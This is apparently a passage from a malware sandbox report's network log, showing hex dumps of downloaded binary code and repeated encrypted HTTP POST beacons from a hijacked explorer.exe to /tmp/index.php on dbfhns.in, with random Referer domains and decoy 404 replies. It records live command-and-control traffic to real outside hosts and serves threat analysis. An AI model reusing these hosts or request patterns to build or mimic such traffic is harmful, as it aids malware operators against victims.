                                                            May 27, 2024 15:24:05.259875059 CEST1236INData Raw: fb 09 77 25 39 f8 77 21 8d 04 80 01 c0 01 d8 8a 1e 46 84 db 75 e6 fe cd 74 09 85 c0 7d 54 eb 09 46 eb 06 f7 d8 7e 4b 78 49 5b 29 de eb 47 fe c5 8a 1e 46 eb 9c bf ff ff ff 0f 8a 1e 46 84 db 74 df 80 fb 61 72 03 80 eb 20 80 eb 30 80 fb 09 76 0b 80
                                                            Data Ascii: w%9w!Fut}TF~KxI[)GFFtar 0vw9wFuuY12_^[@SPvBt@IuZ)[VW_^@*B(@uS1|M=
                                                            May 27, 2024 15:24:05.259888887 CEST1236INData Raw: 89 d7 8b 70 d4 31 c9 8a 0e 41 f3 a4 5f 5e c3 8d 40 00 53 31 db 09 d2 74 1c 8b 40 d4 31 c9 8a 08 3b 4a fc 75 10 4a 8a 3c 01 32 3c 11 80 e7 df 75 04 49 75 f2 43 88 d8 5b c3 90 8b 40 dc 85 c0 74 02 8b 00 c3 8b c0 53 8b d8 8b c3 e8 26 00 00 00 e8 bd
                                                            Data Ascii: p1A_^@S1t@1;JuJ<2<uIuC[@tS&\[S[t0td~^tQSVWK1QIYKtQ[t9t[
                                                            May 27, 2024 15:24:05.259905100 CEST1236INData Raw: 28 50 47 00 01 76 1d 50 52 51 e8 cf ff ff ff 51 54 6a 01 6a 00 68 e1 fa ed 0e ff 15 14 80 47 00 59 59 5a 58 c3 90 80 3d 28 50 47 00 01 76 12 52 54 6a 01 6a 00 68 e2 fa ed 0e ff 15 14 80 47 00 5a c3 50 52 80 3d 28 50 47 00 01 76 10 54 6a 02 6a 00
                                                            Data Ascii: (PGvPRQQTjjhGYYZX=(PGvRTjjhGZPR=(PGvTjjhGZXD$@8PHtnGT$L$9t7=,PGv)=(PGw L$PQXD$H0D$H=,P
                                                            May 27, 2024 15:24:05.268085957 CEST1236INData Raw: 8b c0 55 8b ec 8b 55 08 8b 02 3d 92 00 00 c0 7f 2c 74 5c 3d 8e 00 00 c0 7f 15 74 57 2d 05 00 00 c0 74 5c 2d 87 00 00 00 74 3d 48 74 4e eb 60 05 71 ff ff 3f 83 e8 02 72 36 74 30 eb 52 3d 96 00 00 c0 7f 11 74 3d 2d 93 00 00 c0 74 2e 48 74 13 48 74
                                                            Data Ascii: UU=,t\=tW-t\-t=HtN`q?r6t0R=t=-t.HtHt$:-t/=t&,*&"%R]D$@=(PGwD$PtqD$eT$jPh;@RG\$;


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.853083109.175.29.39804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:24:07.131321907 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://amkihwobrgvem.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 340
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:24:07.131354094 CEST340OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2c 5b 03 6b 2c 90 f4 76 0b 75 2d 0b b7 f1
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA ,[k,vu-ScYU^.mx5>PGUm3aR>I` xM3]W9!e("J=5mca*IWxJ}C/0
                                                            May 27, 2024 15:24:07.927280903 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:24:07 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.853084109.175.29.39804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:24:08.932496071 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://bdtrshdmdsajiin.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 338
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:24:08.932518959 CEST338OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 77 39 fb a0
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA -[k,vuw9)F_y_5<m'8,[+dXB-P'7R)LF9v[GCMr_V#4~6#o_M@pyj|(#G[v
                                                            May 27, 2024 15:24:09.734002113 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:24:09 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.853115109.175.29.39804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:25:21.588725090 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://depvhlbmmte.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 357
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:25:21.588747025 CEST357OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4d 2a ef 96
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vuM*Hft@ZDj?9=B<`pK;QJs^\GRC17x&P$"^5KeOq8zuw=#'4-
                                                            May 27, 2024 15:25:22.409034014 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:25:22 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.853116109.175.29.39804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:25:27.096781015 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://barvntqgmwgcruw.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 358
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:25:27.096811056 CEST358OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7f 2e da 83
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vu.rmhc]U.p)vpbR]6Xy\6Zn|2CJl|9rl&p8hI.u$$8jN-jb]Jb/[{
                                                            May 27, 2024 15:25:27.903228998 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:25:27 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.853117109.175.29.39804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:25:32.321607113 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://cmmajutpfcykk.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 277
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:25:32.321633101 CEST277OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 62 4e de f9
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vubN\{Mi1o%=5BnXln@p]N$o(K)'%Qk-C<!:a48_5(icRWU!Wn{,G
                                                            May 27, 2024 15:25:33.123317957 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:25:33 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.853118109.175.29.39804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:25:39.368552923 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://jrlquvadpwx.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 128
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:25:39.368571997 CEST128OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 74 53 be f7
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vutSy1sLJqAFyq4M^D
                                                            May 27, 2024 15:25:40.166234970 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:25:40 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.853119109.175.29.39804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:25:44.351947069 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://lmlmhdjgxcsr.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 228
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:25:44.351979971 CEST228OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 22 14 ab 83
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vu"rrCJPm?TezNa"#67K>J!UCC6K/\=VHKy&kUA\8K;aBqL?\
                                                            May 27, 2024 15:25:45.166171074 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:25:45 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.853120109.175.29.39804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:25:49.165527105 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://dhyltqofxhpe.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 260
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:25:49.165560961 CEST260OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 27 2b cd a7
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vu'+*yFY$~7^jHt:h5u,(viVFtR5D6{[NXMX/:bz$7BD|ROUKp#C))
                                                            May 27, 2024 15:25:49.971698999 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:25:49 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.853121109.175.29.39804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:25:56.339915991 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://nxoumlltphj.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 196
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:25:56.339953899 CEST196OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 56 37 fa f6
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vuV7R+Q7uWz6rr>`LF[1,65S@q<Jv#EJ8M"]Y?
                                                            May 27, 2024 15:25:57.146100044 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:25:57 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.853122109.175.29.39804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:26:00.859899044 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://etetxpvheghmlur.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 272
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:00.859910965 CEST272OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 25 0a a4 91
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vu%HEGBO!'x\#~#MT~gCJP+M{SU{a."Vl/l8C3RRU@sWUsoSi (
                                                            May 27, 2024 15:26:01.661735058 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:01 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.853123109.175.29.39804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:26:05.875359058 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://spdxbqopubx.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 283
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:05.875405073 CEST283OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4c 20 a4 93
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vuL .mDna\aXt{-M3igG4Q?EzG;s"Fc`dDy3b:.+R!u|91
                                                            May 27, 2024 15:26:06.708801031 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:06 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.853124190.147.128.172804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:26:13.597836018 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://pxinixbdcjjccvdo.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 343
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:13.597836018 CEST343OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 22 b5 83
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vu#"/br]%OqI%>?fZP0|\b01XQ#aT#TqLW-CLc,fgmI)_F}#fnST=CU`XSS
                                                            May 27, 2024 15:26:14.643624067 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:14 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            28192.168.2.853125190.147.128.172804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:26:19.087512970 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://euirtythbemo.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 326
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:19.087548971 CEST326OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 33 22 cb f6
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vu3"EEdL~jm7>TJ?7_'}!f>=$M)%p2=*LY;6k;z{T@~D{m_-
                                                            May 27, 2024 15:26:20.152513981 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:19 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            29192.168.2.853126190.147.128.172804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:26:24.246699095 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://btndjessgdxlt.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 359
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:24.246716022 CEST359OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2d 58 e1 82
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vu-XR@Dt;hSx=1Wue`c#@Ot;$,0RT?h0QMW~b}NuKQEG6gdRO5t_G,%
                                                            May 27, 2024 15:26:25.384758949 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:25 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            30192.168.2.853127190.147.128.172804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:26:32.065397024 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://nfymgppnbopwxnwd.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 215
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:32.065406084 CEST215OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 72 31 c1 83
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vur1b{S[59y)-p#cE*UD(/G>O"wr?;(nFK3OP\
                                                            May 27, 2024 15:26:33.151061058 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:32 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
